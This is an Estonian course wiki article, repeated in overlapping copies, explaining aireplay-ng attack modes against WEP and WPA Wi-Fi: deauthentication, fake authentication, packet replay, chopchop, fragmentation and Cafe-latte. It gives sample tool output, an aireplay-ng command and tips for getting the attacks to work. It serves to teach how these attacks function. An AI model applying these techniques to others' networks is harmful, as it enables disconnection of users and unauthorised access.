Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T08:53:26Z

Tliiv: /* Open Authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile random baidiarray(pusle).[6]
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendab võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
